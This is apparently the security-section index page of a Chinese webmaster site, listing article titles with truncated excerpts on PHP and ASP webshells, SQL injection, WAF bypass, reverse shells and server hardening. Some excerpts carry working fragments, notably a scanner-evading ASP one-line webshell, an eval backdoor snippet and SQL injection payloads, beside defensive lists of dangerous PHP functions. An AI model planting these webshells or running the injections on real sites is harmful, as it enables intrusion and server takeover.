17站长网

17站长网 首页 安全
  • Mysql语法绕过360scan insert防注入方法
  • Mysql语法绕过360scan insert防注入方法
  • 360scan正则:INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx = 提交: http://localhost/360.php?sql=insert into user (user,pass) values ('ad
  •   时间: 2022-9-27 08:52
  • 一些常见的PHP后门原理分析
  • 一些常见的PHP后门原理分析
  • 本地测试结果如下图。 本程序只作为学习作用,请勿拿去做坏事。代码如下: //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count(
  •   时间: 2022-9-27 08:52
  • PHP的一个EVAL的利用防范
  • 前段时间一个程序出的问题。就和这差不多。 代码如下:$code="${${eval($_GET[c])}}";?> 对于上面的代码。如果在URL提交http://www.phpeval.cn/test.php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提
  •   时间: 2022-9-27 08:51
  • PHP脚本木马的高级防范经验
  • 1、首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的 web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_val
  •   时间: 2022-9-27 08:51
  • 六种后台拿shell的方法
  • 一、直接上传获得 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是/imsges/smiles下,以前的联众游戏站和网易的
  •   时间: 2022-9-27 08:50
  • 安全防护 脚本攻击防范策略完全篇
  • 网络上的SQL Injection 漏洞利用攻击,JS脚本,HTML脚本攻击似乎逾演逾烈。陆续的很多站点都被此类攻击所困扰,并非像主机漏洞那样可以当即修复,来自于WEB的攻击方式使我们在防范或者是修复上都带来了很大的不便。
  •   时间: 2022-9-27 08:50
  • phpddos流量攻击预防方法
  • 这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百M,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个phpshell运转,你的宽带将被
  •   时间: 2022-9-27 08:48
  • PHP一句话Webshell变形总结
  • 0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖
  •   时间: 2022-9-27 08:48
  • PHP木马大全 一句话的PHP木马的防范
  • php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress
  •   时间: 2022-9-27 08:47
  • 一次奇遇的渗透
  • 一次奇遇的渗透
  • 作者:y0umer   打开网站发现   习惯的加了一个引号   确定是注入以后直接丢啊D了。(我懒)   这不悲剧了么,猜不出表段??   扫扫目录看看。   发现del.asp打开看看。。   错误提示的
  •   时间: 2022-9-27 08:44
  • Oracle的使用技巧以及脚本代码
  •  1. 如何查看ORACLE的隐含参数?   ORACLE的显式参数,除了在INIT.ORA文件中定义的外,在svrmgrl中用"show parameter *",可以显示。但ORACLE还有一些参数是以“_”,开头的。如我们非常熟悉的“_offline_rollback
  •   时间: 2022-9-27 08:43
  • 如何检测SQL注入技术以及跨站脚本攻击
  • 在最近两年中,安全专家应该对网络应用层的攻击更加重视。因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制,如果你的网络应用程序开发者没有遵循 安全代码进行开发,攻击者将通过80端口进入你的系统
  •   时间: 2022-9-27 08:43
  • php后门木马常用命令分析与防范
  • php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_ ...
  •   时间: 2022-9-27 08:41
  • ThinkPHP framework 任意代码执行漏洞预警
  • ThinkPHP是一个国内使用很广泛的老牌PHP MVC框架。貌似国内有不少创业公司或者项目都用了这个框架。 最近官方发布了一个安全补丁,官方表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 可是貌似大
  •   时间: 2022-9-27 08:38
  • web页面 一些sql注入语句小结
  • 选中 操作页面 提交数据 IP/日期 方式 /zz_article/articleshow.asp articleid=297 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1 124.237.26.212 2007-11-14 SQL注入(GET)
  •   时间: 2022-9-27 08:38
  • php intval()函数使用不当的安全漏洞分析
  • 一、描述 intval函数有个特性:"直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞.二
  •   时间: 2022-9-27 08:37
  • 分享一个不错的iptables脚本
  • 代码如下: 代码如下: #!/bin/sh # modprobe ipt_MASQUERADE modprobe ip_conntrack_ftp modprobe ip_nat_ftp iptables -F iptables -t nat -F iptables -X iptables -t nat -X ###########################INPUT键#
  •   时间: 2022-9-27 08:36
  • 史上最全的各个脚本的一句话木马
  • 以下这个ASP一句话 <%If Request("1") "" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错, 上面这句是防杀防扫的!网上很少人用!可以插在
  •   时间: 2022-9-27 08:34
  • Linux实用一句话脚本介绍
  • 1、查看谁破解你的ssh cat /var/log/auth.log | grep "pam_unix(sshd:auth): authentication failure;" | cut -f14 -d\ | cut -d'=' -f2 | sort | uniq -c | sort -nr 2、查看当前网络连接数 netstat -n | awk '/^tc
  •   时间: 2022-9-27 08:34
  • MSSQL 2005 入侵提权过程分享
  • MSSQL 2005 入侵提权过程分享
  • 前言:本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说。 前期 在拿到一个webshell 后对提权进行分析如下。 1、serv-u 6.4.0.2、mssql sa密码权限3、sogou拼音输
  •   时间: 2022-9-27 08:29
  • PHP Webshell 下的端口反弹方法
  • PHP Webshell 下的端口反弹方法
  • 使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。  测试实例:先在本地执行
  •   时间: 2022-9-27 08:28
  • 手工注入方法,方便大家测试程序漏洞
  • 1、加入单引号 ’提交, 结果:如果出现错误提示,则该网站可能就存在注入漏洞。 2、数字型判断是否有注入; 语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型) 结果:分别返回不同的页面,说明存在注入漏洞. 分析
  •   时间: 2022-9-27 08:28
  • 网站被SQL注入后应该如何防范
  • 网站被“成功”注入,网站一些页面被插入了下载病毒的代码,经查: 生产服务器的代码没有任何被改动过的迹象,排除服务器被入侵,代码被篡改的可能; 有病毒下载代码的部分,在数据库里真实看到了篡改迹象,可以排除
  •   时间: 2022-9-27 08:27
  • php disable_functions的函数列表
  • 禁用不安全的PHP函数,有些php函数是不够安全的,我们必须要加强安全配置,如果做虚拟主机,建议禁止php函数列表如下: 代码如下: disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_
  •   时间: 2022-9-27 08:23
  • php后台插入一句话后门的思路分享
  • 首先介绍下php的各种标签: 1): demo: 这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了! 2): 这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它, 大多程序员都
  •   时间: 2022-9-27 08:22
  • IPC$扫描和IPC$漏洞的防范小结
  • IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。简单点说就是通过你的系统帐号和密码登陆你的系统的一个通道!而 IPC$ 并不算是一个漏洞,但因一般电脑用户设置系统的密
  •   时间: 2022-9-26 14:46
  • 常用的一些注入命令总结!
  • 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varch
  •   时间: 2022-9-26 14:46
  • 浅说双引号被过滤时一句话的插入与防范
  • 浅说双引号被过滤时一句话的插入与防范
  • 一般而言,后台插一句话,如果数据库扩展名是asp的话,那么插数据库,但是如果有配置文件可以插的话,那肯定是插入配置文件了,但是插入配置文件有一个很大的风险,那就是一旦出错那么全盘皆输,有可能不仅仅造成后
  •   时间: 2022-9-26 14:44

热门排行

    最近更新

      返回顶部